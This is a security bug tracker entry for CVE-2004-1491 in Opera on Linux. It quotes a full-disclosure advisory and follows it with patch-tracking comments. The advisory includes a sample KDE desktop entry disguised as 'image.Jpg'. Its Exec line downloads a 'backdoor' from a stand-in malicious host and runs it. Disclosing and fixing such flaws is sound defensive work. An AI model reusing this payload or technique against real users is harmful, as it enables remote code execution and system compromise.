Bugzilla – Bug 64218
VUL-0: CVE-2004-1491: opera - trick user into running arbitrary commands
Last modified: 2021-10-19 13:55:36 UTC
We received the following report via full-disclosure. The issue is public. Date: Mon, 13 Dec 2004 18:05:14 +0000 From: Giovanni Delvecchio <badpenguin79@hotmail.com> To: full-disclosure@lists.netsys.com Subject: [Full-Disclosure] [ZH2004-19SA]Possible execution of remote shell commands in Opera with kfmclient Reply-To: badpenguin@zone-h.org Author: Giovanni Delvecchio e-mail: badpenguin@zone-h.org Tested version: Opera 7.54 linux version with Kde 3.2.3 Original advisory: http://zone-h.org/en/advisories/read/id=6503/ Problem: ======= Opera for linux uses "kfmclient exec" as "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system. Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry. Example of [KDE Desktop Entry]: ________________________________ # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec="Any arbitrary command" Icon= TerminalOptions= Path= Type=Application Terminal=0 ______________________________ Possible method of Exploitation ========================= This method of exploitation needs that a particular file name extension is used. If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed. Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in konqueror. It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since the "system" is case sensitive. Attack scenario: 1- A user clicks on a link which requires http://malicious_server/image.Jpg 2- malicious_server responds with an unknown Content-Type field , for example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window. 3- if a user chooses "Open" to view image.Jpg, it will be opened by "kfmclient exec" command, since kfmclient is the "Default Application" 4- Image.Jpg is a kde desktop entry : --------image.Jpg---------- # KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor Icon= TerminalOptions= Path= Type=Application Terminal=0 ---- end of image.Jpg------- Note: \t is an horizontal tab. In this case a backdoor will be downloaded on victim's computer and executed. Solution: ======== Disable "kfmclient exec" as default application _________________________________________________________________ Ricerche online più semplici e veloci con MSN Toolbar! http://toolbar.msn.it/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
I'll talk to our Opea contact
Waiting for answer from "Espen Sand" <espen@opera.com>
any news? Did you check whether the report is valid at all?
It is confirmed and I still got no reply from Opera; I'll go and find a solution myself.
NEEDINFO is wrong as it refers to the reporter and I cannot provide the information you need.
You may set default filehandler in /usr/share/opera/ini/filehandler.ini Or per user in (created on firstrun) ~/.opera/filehandler.ini (aka $OPERA_DIR/filehandler.ini)
Fixed package submitted to stable
Lukas, please submit packages for older distributions too. The "VUL-0" tag means that all supported versions need an update. Thanks.
OK, down to what version?
8.2
CAN-2004-1491 SM-Tracker-578
8.2 version is still missing .... patchinfo is missing
please reassign to security-team when done. we'll submit patchinfo files then.
Reassigning, 8.2 submitted
fixed packages released.
CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)